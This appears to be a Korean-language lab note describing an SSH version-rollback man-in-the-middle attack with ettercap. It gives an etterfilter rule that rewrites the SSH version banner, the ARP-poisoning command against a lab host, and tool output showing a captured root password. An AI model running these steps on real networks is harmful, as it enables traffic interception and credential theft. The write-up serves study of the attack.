ssh mith with ettercat

ssh.pcap

mitm.pcap

내용
- 서버와 클라이언트 통신 시 ssh 프로토콜 버전 협상이 발생
(Default : SSH-1.99 >> 2버전)
- MITM을 통해 취약한 버전의 SSH 통신토록 설정

SSH v1 VS SSH v2

ssh ver 1 : 키교환 Hybrid-Cryptography
=> Version Rollback MITM공격에 취약 (암호화된 트래픽 해독)

ssh ver 2 : 키교환 Diffie-Hellman
=> 다소간 취약하지만 ver 1보다 안전함

0x01. 필터링 규칙 생성
# vi ssh_rb.ef
if ( search(DATA.data, "SSH-1.99"))
{
    replace("SSH-1.99","SSH-1.51");
}
 
# etterfilter -o ssh_rb.ef2 ssh_rb.ef

0x02. MITM 시도
# ettercap -T -q -F ssh_rb.ef2 -M ARP /10.0.0.130/ //

-T, --text                  use text only GUI
-q, --quiet                 do not display packet contents
-F, --filter <file>         load the filter <file> (content filter)
-M, --mitm <METHOD:ARGS>    perform a mitm attack

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from ssh_rb.ef2...
Listening on eth0... (Ethernet)

  eth0 ->    00:0C:29:BF:9E:AC        10.0.0.134     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

4 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 10.0.0.130 00:0C:29:42:2A:82

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

SSH : 10.0.0.130:22 -> USER: root  PASS: asdfasdf



참고
- http://superuser.egloos.com/3199639
- http://www.irongeek.com/i.php?page=security/ettercapfilter